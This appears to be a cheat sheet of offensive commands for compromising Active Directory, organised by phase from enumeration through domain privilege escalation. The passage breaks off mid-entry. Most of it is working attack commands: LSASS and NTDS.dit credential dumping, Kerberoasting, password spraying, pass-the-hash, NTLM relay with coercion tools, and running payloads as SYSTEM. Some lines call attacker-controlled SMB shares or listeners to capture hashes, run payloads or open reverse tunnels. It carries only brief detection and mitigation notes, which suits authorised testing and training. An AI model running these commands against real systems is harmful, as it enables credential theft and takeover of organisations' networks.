Get-ADForest (Get-ADForest).DomainsAppLocker Policy:
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
BloodHound (Visual Attack Path Analysis):
Collectors:
SharpHound (C#):
SharpHound.exe -c All --NoSaveCache(Default)
SharpHound.exe --CollectionMethods All --Domain <DomainFQDN> --StealthSharpHound.exe --CollectionMethods Session,LoggedOn -Loop -Loopduration 00:30:00 -Loopinterval 00:05:00SharpHound.exe -c All,GPOLocalGroup --LdapUsername <User> --LdapPassword <Pass> ...SharpHound.exe --CollectionMethod DCOnly(Stealthier)
SharpHound.exe --computerfile <file_of_targets>(Specific computer enumeration)
Comprehensive:
SharpHound.exe --CollectionMethods All,GPOLocalGroup,CARegistry,DCRegistry,CertServices --Domain <Domain> --Stealth --JSONFolder <Path> --EncryptZip --RandomizeFileNames --PrettyJson --Throttle 1000 --Jitter 25
Key Collection Methods:
Group
LocalAdmin
Session
Trusts
ACL
Container
RDP
DCOM
PSRemote
GPOLocalGroup
LoggedOn
ObjectProps
SPNTargets
UserRights
CARegistry
DCRegistry
Invoke-BloodHound (PowerShell):
Invoke-BloodHound -CollectionMethod All -Domain <DomainFQDN> -LDAPUser <User> -LDAPPass <Password>BloodHound.py (Python):
bloodhound-python -u <USER> -p <PASSWORD> -d <DOMAIN_FQDN> -ns <DC_IP_or_Name> -gc <GC_IP> -c All --zipCertipy for AD CS data:
certipy find 'domain/user:pass@dc' -bloodhound
Analysis: Import JSON/ZIP to BloodHound GUI. Neo4j setup:
sudo neo4j consoleor Docker. Access GUI athttp://localhost:7474.Custom Queries:
hausec/Bloodhound-Custom-Queries,CompassSecurity/BloodHoundQueries,ly4k/Certipy BloodHound Custom Queries.
NetExec (nxc, formerly CrackMapExec):
SMB:
nxc smb <Targets> -u <user> -p <pass> --users, --groups, --loggedon-users, --sessions, --local-groups, --pass-pol, --rid-brute [MAX_RID], --laps nxc smb <Targets> --local-auth --usersLDAP:
nxc ldap <DC_IP> -u <user> -p <pass> --users, --groups, --computers, --admin-count, --trusted-for-delegation, --password-not-required, --asreproast <file>, --kerberoasting <file>
ADRecon:
ADRecon.ps1 ADRecon.ps1 -DomainController <DC_IP_or_FQDN> -Credential <DOMAIN\User> ADRecon.ps1 -GenExcel <report_folder>Sysinternals ADExplorer: GUI tool for browsing AD database, taking snapshots.
PingCastle: Auditing AD security level.
PingCastle.exe --healthcheck --server <DC_IP>Group3r: Auditing GPO misconfigurations.
group3r.exe -d <domain> -sSnaffler: Finding sensitive files on shares.
Snaffler.exe -s -d <domain> -o snaffler.log -v dataLAPS Toolkit:
Find-LAPSDelegatedGroups,Find-AdmPwdExtendedRights,Get-LAPSComputers(if LAPS is deployed).Get-AdmPwdPassword -ComputerName <CompName>.Living Off The Land (LOLBAS) for Enumeration (Windows Native):
net user /domain net group /domain net localgroup administrators /domaindsquery user -name <user*>(requires RSAT or on DC)
wmic useraccount get name,sid wmic group get name,sid wmic ntdomain list /format:listnltest /domain_trusts nltest /dclist:<domain>gpresult /r(Applied GPOs for current user/computer)
whoami /priv(Check current user privileges)
qwinsta /server:<target>(Check RDP sessions)
1.4 Initial User Hunting & Access Validation (Internal Recon - Often Unauthenticated or Low-Priv)
PowerView:
Find-DomainUserLocation,Invoke-UserHunter -CheckAccess,Invoke-EnumerateLocalAdmin -VerboseKerbrute:
kerbrute userenum -d <DOMAIN> --dc <DC_IP> <userlist.txt> -o valid_users.txt(Uses Kerberos Pre-Auth failures to validate users, stealthier than SMB enumeration).
Compile from source:
git clone https://github.com/ropnop/kerbrute.git; cd kerbrute; make all
NetExec (nxc):
nxc smb <DC_IP> --users(If null session allowed).
rpcclient:
rpcclient -U "" -N <DC_IP>then
enumdomusers.windapsearch.py:
windapsearch.py --dc-ip <DC_IP> -U(Anonymous LDAP users).
Passive Network Analysis: Wireshark/tcpdump for ARP, MDNS, NBT-NS to identify hosts.
sudo tcpdump -i <interface> -w capture.pcapResponder in Analyze mode:
sudo responder -I <interface> -A(Analyze mode for NetBIOS-NS/LLMNR broadcasts).
Phase 2: Initial Access - Getting a Foothold 🔑
Your Goal Here: Gain an initial entry point into the network or onto a system within the AD environment.
Pro Tip: This often involves exploiting vulnerabilities in public-facing applications, tricking users via phishing, leveraging password reuse/spraying against externally accessible services, or exploiting external misconfigurations. C2 frameworks like Covenant or Sliver are crucial for payload generation, delivery, and post-access operations.
Your Toolkit & Commands/Techniques:
Exploiting Public-Facing Applications:
Web Vulnerabilities (SQLi, RCE, LFI/RFI, XXE, Deserialization, SSRF, etc.):
Tools: sqlmap, Burp Suite, OWASP ZAP, Metasploit, custom exploit scripts.
Example (sqlmap):
sqlmap -u "http://target.com/vuln.php?id=1" --dbs --batch --os-shell --risk=3 --level=5
VPN Vulnerabilities: Search Exploit-DB, GitHub, Metasploit for CVEs (e.g., Pulse Secure, Fortinet, Citrix).
Mail Server Exploits (Exchange: ProxyLogon, ProxyShell, ProxyNotShell, OWASSRF, CVE-2020-0688): PoCs, Metasploit.
Other Exposed Services (RDP, SSH, Jenkins, Tomcat, JBoss, SharePoint, Struts): Default creds, brute-force (hydra, medusa, nxc), known exploits.
Phishing & Spear Phishing:
Malicious Attachments: Office macros (VBA Stomping), ISO/LNK/HTA/CHM, weaponized PDFs.
Tools: Unicorn, Macro_Pack, EvilOffice, Luckystrike.
Credential Harvesting: Fake login pages (O365, VPN).
Tools: Gophish, Social-Engineer Toolkit (SET), Evilginx2 (MitM for 2FA), CredSniper.
Link-Based Attacks: Drive-by downloads (BeEF).
DDE Attacks: Office DDE to execute commands.
Further Reading: "The Hitchhiker's Guide To Initial Access", "Phishing with Empire".
Password Spraying:
Goal: Try few common passwords (e.g., "Spring2024!", "Password123") against many usernames.
Pro Tip: Mind lockout policies (
Get-DomainPolicy,enum4linux-ng -P). Spray slowly. Target SMB, LDAP, OWA, EWS, WinRM, Azure AD, RDP.Tools:
NetExec (nxc):
nxc <protocol> <Target_Range_or_DC_IP> -u <UserListFile.txt> -p '<PasswordToTry>' --continue-on-success --log spray.logMSOLSpray (Azure/O365):
MSOLSpray.py -u <UserListFile.txt> -p '<PasswordToTry>' --throttle 5 --lockout 3Spray (Go tool):
spray -u <UserListFile.txt> -p '<PasswordToTry>' -t <Target_IP_or_Domain> -threads 5 -delay 60sRuler (Exchange)
DomainPasswordSpray.ps1:
Invoke-DomainPasswordSpray -UserList <UserListFile.txt> -Password <PasswordToTry> -Domain <DomainName>Kerbrute:
kerbrute passwordspray -d <domain> --dc <DC_IP> <userlist_file> <password_to_try>
Custom Scripts: Using PowerShell
Invoke-RestMethodor Pythonrequestsfor web-based login forms.
URL File Attacks (NTLM Hash Capture with Responder):
.urlfile withIconFile=\\<AttackersResponderIP>\%USERNAME%.icon.LLMNR/NBT-NS/mDNS Poisoning (Responder/Inveigh):
Responder (Linux):
sudo responder -I <interface> -wrfvb(Poisoning mode) or
-A(Analyze mode). Hashes logged to/usr/share/responder/logs/.Inveigh (Windows PowerShell/C#):
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y(PowerShell).
Inveigh.exe(C# version, interactive console with GET NTLMV2UNIQUE).Mitigation: Disable LLMNR/NBT-NS via GPO/local settings. Enable SMB Signing. Network segmentation.
Detection: Monitor UDP 5355, 137. Event ID 4697, 7045. Registry changes for EnableMulticast.
Exploiting External Misconfigurations: Open SMB, RDP/WinRM with weak creds, default creds on devices, leaked creds (GitHub, Pastebin), DNS misconfigs. Check for misconfigured cloud services (S3 buckets, Azure Blobs) connected to AD, or OAuth misconfigurations.
Supply Chain Attacks: Compromising a less secure third-party vendor or software update mechanism. (Highly sophisticated, typically out of scope for standard pentests unless specified).
C2 Frameworks for Payload Generation & Delivery:
Covenant C2: .NET C2. Setup:
dotnet run. Create Listeners, Launchers (PowerShell, Binary, ShellCode, MSBuild, etc.).Sliver C2: Go-based.
generate beacon ...,generate stager ....
Phase 3: Credential Access & Dumping - Harvesting Secrets 🍯
Your Goal Here: Obtain valid credentials (plaintext passwords, NTLM hashes, Kerberos tickets and keys) to expand access and move laterally.
Pro Tip: LSASS memory is a prime target. Kerberos tickets are gold. Always try to operate in memory if possible to avoid disk-based detection. Shadow copies can be used to access locked files like NTDS.dit or SAM hives. Be aware of LSA Protection (PPL) and Credential Guard, which make LSASS dumping harder.
Your Toolkit & Commands:
Dumping LSASS Memory (lsass.exe):
Mimikatz (admin/SYSTEM):
privilege::debug token::elevate sekurlsa::logonpasswords sekurlsa::ekeys sekurlsa::tickets /export sekurlsa::tspkg sekurlsa::dpapi sekurlsa::minidump lsass.dmp
❗ LSA Protection (PPL) Bypass:
Kernel (Driver):
mimidrv.sys(!+,!processprotect /process:lsass.exe /remove, dump,!-)Userland (Malicious SSP):
misc::memssp(Logs tokiwissp.logormimilsa.log. Noisy, needs reboot/new logons).Userland (PPLDump tool)
❗ Credential Guard: If enabled,
lsaiso.exevirtualizes LSASS. Mimikatz usually can't get plaintext/TGTs fromlsass.exe.ProcDump (Sysinternals):
On target (Admin/SYSTEM):
procdump.exe -accepteula -ma lsass.exe lsass.dmp(-ma: full dump)
Offline (with Mimikatz):
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit
Windows Task Manager: GUI, less stealthy, right-click
lsass.exe-> "Create dump file".Metasploit (Meterpreter with SYSTEM):
load kiwi,creds_all,kerberos,msv. Modules:post/windows/gather/smart_hashdump,post/windows/gather/credentials/mimikatz,post/windows/gather/lsa_secrets.SharpDump (.NET): Assembly for LSASS dump.
gsecdump: Older tool, likely detected.
NetExec Modules:
lsassy,procdump,handlekatz,nanodump.nxc smb <target> -u <user> -p <pass> -M lsassynxc smb <target> -u <user> -p <pass> -M procdumpnxc smb <target> -u <user> -p <pass> -M nanodump --dump-format pypykatz(Specify format for pypykatz parsing)
Extracting Hashes from SAM/SYSTEM (Local Accounts):
Live (admin/SYSTEM):
reg save HKLM\SYSTEM system.hive reg save HKLM\SAM sam.hive reg save HKLM\SECURITY security.hive(optional, for LSA secrets). Copy hives offline.
Offline (Impacket secretsdump.py):
secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCALMimikatz (offline):
lsadump::sam /sam:sam.hive /system:system.hiveMimikatz (live):
token::elevate lsadump::sam lsadump::secretsMetasploit (Meterpreter):
hashdump,run post/windows/gather/hashdumpNetExec (nxc):
nxc smb <target> -u <user> -p <pass> --sam, --lsa
Dumping NTDS.dit (Domain Controller - All Domain Hashes & Keys):
VSS (Volume Shadow Copy) - Preferred on live DC (DA or SeBackupPrivilege):
ntdsutil.exe:
ntdsutil "ac i ntds" "ifm" "create full C:\ntds_backup" q qCopy
C:\ntds_backup\Active Directory\ntds.ditandC:\ntds_backup\registry\SYSTEM.vssadmin.exe:
vssadmin create shadow /for=C:Copy files from shadow path (e.g.,
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\ntds.ditand...\System32\config\SYSTEM). Cleanup:vssadmin delete shadows /alldiskshadow.exe script:
set context persistent nowriters set metadata c:\windows\temp\backup.cab set verbose on begin backup add volume C: alias ntds_backup_drive create expose %ntds_backup_drive% X: # Manually copy X:\Windows\NTDS\ntds.dit and X:\Windows\System32\config\SYSTEM unexpose X: delete shadows exposed X: end backup reset
Offline (Impacket secretsdump.py):
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile ntds_extracts.txtMetasploit (Meterpreter on DC):
post/windows/gather/credentials/domain_hashdumpInvoke-NinjaCopy (PowerSploit): Copies locked files (needs SeBackupPrivilege).
NetExec (nxc):
nxc smb <DC_IP> -u <DA_user> -p <DA_pass> --ntds [vss|drsuapi](drsuapi is DCSync)
Kerberoasting (Service Accounts with SPNs):
Goal: Request TGS for service accounts (RC4 encrypted with service account's NTLM hash). Crack offline. Any domain user.
PowerView:
Get-NetUser -SPN | Select-Object samaccountname,serviceprincipalname,descriptionRequest-SPNTicket -SPN <SPN_from_above> -Format Hashcat | Out-File -Encoding ASCII kerberoast_hashes.txtInvoke-Kerberoast -OutputFormat Hashcat
ADModule:
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalNameImpacket GetUserSPNs.py:
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<User_with_read_access_or_DA>:<Password> -outputfile kerb_hashes.txtWith hash:
-hashes <LM:NT>
Rubeus:
Rubeus.exe kerberoast /outfile:kerb_hashes.txt /format:hashcat Rubeus.exe kerberoast /rc4opsec /aes /user:<svc_acc> /creduser:<user> /credpassword:<pass>NetExec (nxc):
nxc ldap <DC_IP> -u <USER> -p <PASSWORD> --kerberoasting kerb_hashes.txt --kdcHost <KDC_IP>Cracking:
hashcat -m 13100 kerb_hashes.txt <WordlistFile>(RC4-HMAC)
Detection: Event ID 4769 (TGS request) with RC4, high volume.
Mitigation: Strong passwords for service accounts (25+ chars), gMSA, prefer AES for Kerberos (msDS-SupportedEncryptionTypes), monitor TGS requests.
AS-REP Roasting (Users with Pre-auth Disabled):
Goal: Request AS-REP (encrypted with user's NTLM hash) for users with "Do not require Kerberos preauthentication". Crack offline. No domain creds needed for enum if anonymous LDAP.
PowerView:
Get-DomainUser -PreauthNotRequired -Verbose | Select-Object samaccountnameADModule:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True -and Enabled -eq $True} ...Force Disable Pre-auth (if write perms):
Set-DomainObject -Identity <User> -XOR @{useraccountcontrol=4194304} -VerboseImpacket GetNPUsers.py:
GetNPUsers.py <DOMAIN>/ -usersfile <UserListFile.txt> -format hashcat -outputfile asrep_hashes.txt -dc-ip <DC_IP>Rubeus:
Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt /domain:<DOMAIN> /dc:<DC_IP> Rubeus.exe asreproast /user:<username> /ou:<OUName>NetExec (nxc):
nxc ldap <DC_IP> -u <UserListFile.txt> -p '' --asreproast asrep_hashes.txt(if no creds needed for enum)
Cracking:
hashcat -m 18200 asrep_hashes.txt <WordlistFile>(Kerberos 5 AS-REP etype 23)
Detection: Event ID 4768 (TGT request) error
0x19, or successful TGTs for these accounts. Event ID 4738 (user account changed).Mitigation: Disable "Do not require Kerberos preauthentication". Strong passwords. Monitor attribute changes.
Searching for Passwords in Files/Registry/GPOs/Config Artifacts:
SYSVOL (GPP Passwords): PowerView
Get-GPPPassword, NetExecnxc smb <DC_IP> ... --gpp-passwords. Manual: Look in\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\forGroups.xml,Services.xml,ScheduledTasks.xml. DecryptcPasswordattribute usinggpp-decryptor online tools.Config Files:
web.config,application.ini,unattend.xml,php.ini,.env.Scripts: PowerShell, batch, VBS, Python.
User Docs:
passwords.txt,creds.xlsx.Registry: VNC, RDP managers, FTP clients.
Tools:
grep,findstr,Invoke-ShareFinder,SharpShares,Invoke-FileFinder,Snaffler.NetExec Modules:
gpp_password,gpp_autologin.nxc smb <DC_IP> -u <user> -p <pass> -M gpp_passwordnxc smb <DC_IP> -u <user> -p <pass> -M gpp_autologin
Dumping Browser Credentials: LaZagne, SharpChromium, Mimikatz (
dpapi::chrome,dpapi::firefox).Dumping DPAPI Protected Secrets (Windows Data Protection API):
Mimikatz:
Get masterkey:
dpapi::masterkey /in:"<Path_to_MasterKeyFile>" /system(if SYSTEM context) or
/rpc(if remote) or by providing user's password/hash.<Path_to_MasterKeyFile>: TypicallyC:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<User_SID>\...Decrypt credential:
dpapi::cred /in:"<Path_to_CredentialFile>" /masterkey:<Derived_MasterKey_from_above>
SharpDPAPI:
SharpDPAPI.exe masterkeys /target:"C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<User_SID>" SharpDPAPI.exe creds /target:"<Path_to_Cred_File_or_Directory>" /server:<DC_IP>
LSA Secrets / Policy Secrets (often contains service account passwords):
Mimikatz (SYSTEM):
token::elevate,lsadump::secrets.secretsdump.py(offline against SYSTEM and SECURITY hives).
MSSQL Credential Harvesting: UNC Path Injection:
EXEC master..xp_dirtree '\\attacker_smb\share'. PowerUpSQL:Get-MSSQLLinkPasswords,Get-MSSQLCredential.Exchange Credential Harvesting: Embed SMB links in emails/calendar invites.
Phase 4: Lateral Movement - Spreading Through the Network 🚶♂️➡️🚶♀️
Your Goal Here: Use compromised credentials (plaintext, hash, ticket) or exploits to gain access to other systems within the network, moving closer to high-value targets.
Pro Tip: Choose technique based on the credentials you have and the services available on the target. Prioritize stealth and "living off the land" where possible. NTLM Relay is powerful if SMB signing is disabled or not required on target services. C2 frameworks like Sliver can manage pivots and deploy agents. Be aware of UAC remote restrictions (RID 500 vs. other local admins).
Your Toolkit & Commands (assuming you have credentials/tickets):
Pass-the-Hash (PtH) with NTLM Hashes:
NetExec (nxc - SMB):
nxc smb <Target_IP_or_Range> -u <USER> -H <NTHASH_or_LMHASH:NTHASH> -x "whoami" nxc smb <Target_IP_or_Range> -u <USER> -H <NTHASH> --put-file <LocalFile> <RemotePath>Impacket (Linux):
pth-winexe -U <DOMAIN>/<USER>%<NTHASH> //<TARGET_IP> cmd.exe # pth-smbclient ..., pth-rpcclient ... smbexec.py <DOMAIN>/<USER>@<TARGET_IP> -hashes <LMHASH>:<NTHASH> wmiexec.py <DOMAIN>/<USER>@<TARGET_IP> -hashes <LMHASH>:<NTHASH>Metasploit
exploit/windows/smb/psexecmodule:set RHOSTS <Target_IP> set SMBUser <USER> set SMBPass <NTHASH_or_LMHASH:NTHASH> set PAYLOAD <payload> exploitInvoke-SMBExec / Invoke-WMIExec (PowerSploit - PowerShell):
Invoke-SMBExec -Target <Target_IP> -Domain <DOMAIN> -Username <USER> -Hash <NTHASH> -Command "whoami" Invoke-WMIExec -Target <Target_IP> -Domain <DOMAIN> -Username <USER> -Hash <NTHASH> -Command "whoami"Mimikatz (for OverPass-the-Hash - creates new process with tickets from hash):
privilege::debug sekurlsa::pth /user:<USER> /domain:<DOMAIN_FQDN> /ntlm:<NTHASH> /run:"cmd.exe"
Pass-the-Ticket (PtT) with Kerberos Tickets (.kirbi files):
Mimikatz (Windows):
kerberos::ptt <Path_To_Ticket.kirbi>(Injects ticket into current session)
Rubeus (Windows):
Rubeus.exe ptt /ticket:<Path_To_Ticket.kirbi_or_Base64String> [/luid:<LogonID>]Impacket (Linux): Set env var:
export KRB5CCNAME=/path/to/ticket.ccache. Then use Impacket tools with-k -no-pass.PsExec (after PTT on Windows):
PsExec.exe -k \\<Target_IP> cmd.exe(-k uses Kerberos)
OverPass-the-Hash (OPtH) / Pass-the-Key (NTLM Hash or AES Key to get Kerberos Tickets):
Mimikatz (Windows):
sekurlsa::pth /user:<USER> /domain:<DOMAIN_FQDN> /ntlm:<NTHASH> sekurlsa::pth /user:<USER> /domain:<DOMAIN_FQDN> /aes256:<AES256_KEY>Rubeus (Windows):
Rubeus.exe asktgt /user:<USER> /domain:<DOMAIN_FQDN> /ntlm:<NTHASH> /ptt Rubeus.exe asktgt /user:<USER> /domain:<DOMAIN_FQDN> /aes256:<AES256_KEY> /pttOption:
/outfile:ticket.kirbiinstead of/ptt.
Remote Desktop Protocol (RDP) - Port 3389:
Plaintext:
Linux:
xfreerdp /v:<Target_IP> /u:<DOMAIN\USER> /p:<PASSWORD> /dynamic-resolutionWindows:
mstsc.exe /v:<Target_IP>(prompts for creds)
Restricted Admin Mode (
/restrictedadmin):Condition: Enabled on target. Allows RDP using network logon (hash/ticket).
Windows (after PtH/PtT):
mstsc.exe /v:<Target_IP> /restrictedadminCheck if enabled:
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin(0 = enabled, 1 or not exist = disabled).
Enable (needs admin on target):
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD /f
Pass-the-Hash/Ticket with RDP:
Linux:
proxychains4 -q xfreerdp /u:user /pth:HASH /d:domain /v:targetWindows (after Rubeus
asktgtandptt):mstsc /restrictedAdmin
SharpRDP: .NET tool for non-GUI RDP command execution.
SharpRDP.exe computername=<target> command="payload" username=<user> password=<pass>Clean RunMRU:
CleanRunMRU.exe clearall(Clears RDP connection history)
Pro Tip: Check for existing RDP sessions using
qwinsta /server:<Target_IP>. If you have admin rights on the target, you might be able to hijack sessions (e.g., usingtscon).
Windows Remote Management (WinRM / PowerShell Remoting) - Ports 5985 (HTTP), 5986 (HTTPS):
Plaintext (PowerShell):
$cred = Get-Credential # prompts for DOMAIN\USER and PASSWORD Invoke-Command -ComputerName <Target_IP> -ScriptBlock {whoami} -Credential $cred Enter-PSSession -ComputerName <Target_IP> -Credential $credEnable PS Remoting (Needs Admin):
Enable-PSRemoting -ForceEvil-WinRM (Ruby - NTLM Hashes):
evil-winrm -i <Target_IP> -u <USER> -H <NTHASH> evil-winrm -i <Target_IP> -u <USER> -p <PASSWORD>NetExec (nxc - WinRM):
nxc winrm <Target_IP_or_Range> -u <USER> -p <PASSWORD_or_H <NTHASH>> -x "whoami"Metasploit:
exploit/windows/winrm/winrm_script_exec,auxiliary/scanner/winrm/winrm_loginwinrs.exe (Windows native):
winrs -r:<target> "command" winrs -r:<target> /u:<user> /p:<pass> "command"Copy files over WinRM:
New-PSSession, thenCopy-Item -ToSession $session ...or-FromSession $session ...Kerberos Double Hop Problem: WinRM by default doesn't delegate credentials. Workarounds:
Pass credentials explicitly for each hop:
Invoke-Command -ComputerName ServerB -Credential $cred1 -ScriptBlock { Invoke-Command -ComputerName ServerC -Credential $cred2 -ScriptBlock {whoami} }Register PSSession Configuration (CredSSP or RunAs):
Register-PSSessionConfiguration -Name <ConfName> -RunAsCredential $cred(requires admin on intermediate host). Then
Enter-PSSession -ComputerName ServerB -ConfigurationName <ConfName>.
PsExec (Sysinternals - SMB, admin on target):
PsExec.exe \\<Target_IP> -u <DOMAIN\USER> -p <PASSWORD> cmd.exeUse
-sfor SYSTEM. Can also be used with PtH if run from a context where hash is already passed.SMB Based (Impacket tools):
smbexec.py <DOMAIN>/<USER>:<PASS_or_HASH>@<TARGET> atexec.py <DOMAIN>/<USER>:<PASS_or_HASH>@<TARGET> "command"WMI Based (wmic, Impacket wmiexec.py, PowerShell Invoke-WmiMethod):
wmiexec.py <DOMAIN>/<USER>:<PASS_or_HASH>@<TARGET> "whoami"PowerShell:
Invoke-WmiMethod -ComputerName <Target> -Class Win32_Process -Name Create -ArgumentList "payload.exe" -Credential $credwmic /node: /user: /password: process call create "command"
NTLM Relay Attacks (if SMB signing disabled/not required):
Tools:
Responder.py,ntlmrelayx.pysudo ntlmrelayx.py -tf targets_smb_signing_disabled.txt -smb2support -i(Interactive SMB shell)
Relay to AD CS (ESC8):
sudo ntlmrelayx.py ... -t http://<ADCS_IP>/certsrv/certfnsh.asp --adcs --template <TemplateName>Coercion:
PetitPotam.py <attacker_relay_IP> <DC_to_coerce> PrinterBug.py <DC_to_coerce> <attacker_relay> DFSCoerce.py <attacker_relay> <DC_to_coerce>(Use with
ntlmrelayx.pytargeting AD CS or other services).
Exploiting Service Misconfigurations:
Check config:
sc.exe \\<Target_IP> qc <ServiceName>Check perms:
accesschk.exe -uwcqv <USER> <ServiceName>(Sysinternals)
Action: If perms allow, modify
binPathto payload, restart service.
Scheduled Tasks (schtasks.exe):
Legacy:
at \\<Target_IP> 13:37 /interactive cmd.exeModern:
schtasks /create /s <Target_IP> /u <DOMAIN\USER> /p <PASSWORD> /tn <TaskName> /tr "C:\path\to\payload.exe" /sc ONCE /st HH:MM schtasks /run /s <Target_IP> /u <DOMAIN\USER> /p <PASSWORD> /tn <TaskName> schtasks /delete /s <Target_IP> /u <DOMAIN\USER> /p <PASSWORD> /tn <TaskName> /fFor SYSTEM:
/ru System
DCOM Lateral Movement:
Tools:
Invoke-DCOM(PowerShell), Impacketdcomexec.py.Example (Impacket):
dcomexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET_IP> -object ShellBrowserWindow "ping -n 1 <Your_IP>"
MSSQL Linked Servers:
EXECUTE('xp_cmdshell "whoami"') AT "<LinkedServerName>";SCCM:
SharpSCCM.exe invoke client-push -t <Target>Sliver C2 Pivoting:
socks5 start -P <port>,pivots named-pipe-bind <pipename>,rportfwd add -b <bind_port> -r <remote_host>:<remote_port>Port Forwarding (e.g., Chisel, netsh):
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=<LocalPortOnCompromisedHost> connectaddress=<InternalTargetIP> connectport=<InternalTargetPort>Chisel: Server on attacker:
./chisel server -p <port> --reverse. Client on compromised host:chisel.exe client <attacker_IP>:<port> R:socks
SharpNoPSExec / NimExec: Fileless remote command execution via service manipulation.
Reg.exe (Remote Registry): If RemoteRegistry service is running and permissions allow.
E.g., IFEO debugger:
reg.exe add "\\<target>\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t REG_SZ /d "\\<attacker_smb_server>\share\payload.exe"(Payload runs when
msedge.exestarts). RequiresAllowInsecureGuestAuthif SMB share is anonymous.
Phase 5: Privilege Escalation - Climbing the Ladder (Local & Domain) 🪜
Your Goal Here: Elevate privileges from a compromised user account (standard user, local admin) to a higher level, ideally Domain Admin or Enterprise Admin on the domain, or SYSTEM on a local machine.
Pro Tip: Enumerate thoroughly on the compromised host (for local privesc) and the domain (for domain privesc). Misconfigurations, vulnerabilities, and excessive permissions are your friends. BloodHound is key for visualizing AD attack paths.
5.1 Local Privilege Escalation (Windows)
Goal: Elevate from a standard user to Local Administrator or SYSTEM on the current machine.
Tools for Enumeration & Exploitation:
PowerUp.ps1 (PowerSploit):
Invoke-AllChecksSherlock.ps1:
Find-AllVulnsorInvoke-SherlockSeatbelt.exe:
Seatbelt.exe -group=all -fullWindows Exploit Suggester - Next Generation (WES-NG):
systeminfo > systeminfo.txt(on target), thenwes.py systeminfo.txt(on attack machine).Juicy Potato / Rotten Potato / PrintSpoofer / GodPotato / Lovely Potato: Token abuse (SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege).
Metasploit:
post/multi/recon/local_exploit_suggester,exploit/windows/local/...,post/windows/escalate/getsystemBeRoot, Privesc.py/ps1, FullPowers.
Common Techniques:
Kernel Exploits: Identify missing patches. Caution: Unstable.
Misconfigured Services / Weak Service Permissions:
Unquoted Service Paths:
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """If path
C:\Program Files\Some Dir\service.exeis unquoted, try placingC:\Program.exe.Writable Service Binaries:
icacls <PathToServiceExecutable>Replace binary, restart service.
Writable Service Registry Config:
reg query HKLM\SYSTEM\CurrentControlSet\Services\<SvcName> accesschk.exe -uvwqk HKLM\SYSTEM\CurrentControlSet\Services\<SvcName>Modify
ImagePath.DLL Hijacking for Services.
AlwaysInstallElevated:
Check:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedBoth must be
0x1.Exploit:
msfvenom ... -f msi -o payload.msi, thenmsiexec /quiet /qn /i payload.msi.PowerUp:
Get-RegistryAlwaysInstallElevated,Write-UserAddMSI.
Stored Credentials / Password Mining (Locally):
PowerShell history:
Get-Historyor file(Get-PSReadlineOption).HistorySavePath.Credential Manager:
cmdkey /list.Windows Vault:
VaultCmd.exe /list.Browser vaults, config files, scripts, user docs.
Group Policy Preferences (GPP) Passwords (Local/SYSVOL): PowerUp:
Get-GPPPassword.Token Impersonation/Theft (Requires SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege):
PrintSpoofer:
PrintSpoofer.exe -i -c "C:\path\to\payload.exe"(runs payload as SYSTEM).
Metasploit Incognito:
use incognito,list_tokens -u,impersonate_token "NT AUTHORITY\SYSTEM".Invoke-TokenManipulation (PowerSploit).
Scheduled Tasks with Weak Permissions.
DLL Hijacking (Applications).
PATH Interception.
CVEs: SMBGhost (CVE-2020-0796), HiveNightmare/SeriousSAM (CVE-2021-36934).
Further Reading: Windows Local Privilege Escalation Cookbook (FuzzySecurity).
5.2 Domain Privilege Escalation
Goal: Elevate from local admin/domain user to Domain Admin or Enterprise Admin.
Exploiting Kerberos Delegation:
Unconstrained Delegation:
Condition: Compromise UCD host. DA authenticates. DA's TGT cached in LSASS.
Find:
Get-NetUser -Unconstrained,Get-NetComputer -Unconstrained.Exploit: Dump LSASS (mimikatz
sekurlsa::tickets /export), PtT DA's TGT.Coerce Auth (Printer Bug/SpoolSample):
SpoolSample.exe <DA_Machine_or_DC> <Compromised_UCD_Host>
Constrained Delegation (S4U2Self, S4U2Proxy):
Find:
Get-DomainUser/Computer -TrustedToAuth.Traditional CD: If control SvcA trusted to delegate to SPN_on_Target, impersonate UserX to SPN_on_Target.
Rubeus:
Rubeus.exe s4u /user:SvcA /rc4:Hash_SvcA /impersonateuser:UserX /msdsspn:SPN_on_Target /altservice:cifs/DC01 /pttKekeo:
tgt::ask ..., thentgs::s4u ...
Resource-Based Constrained Delegation (RBCD):
Condition: Write access to target computer's
msDS-AllowedToActOnBehalfOfOtherIdentity.Exploit: Modify target's attribute to allow ControlledUser to impersonate. Then S4U from ControlledUser as DA to target.
Powermad:
New-MachineAccount -MachineAccount AttackerPC -Password <pass>PowerView: Craft SD,
Set-DomainObject -Identity TargetComputer -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}Rubeus (S4U):
Rubeus.exe s4u /user:AttackerPC$ /rc4:<hash_of_AttackerPC$> /impersonateuser:Administrator /msdsspn:HOST/TargetComputer /altservice:cifs /ptt
Abusing ACLs/DACLs on AD Objects:
Condition: Compromised user has excessive perms (GenericAll, GenericWrite, WriteDACL, WriteOwner, WriteProperty for member or userPassword) on DA user/group, DC computer, GPO, OU.
Reset DA password: PowerView
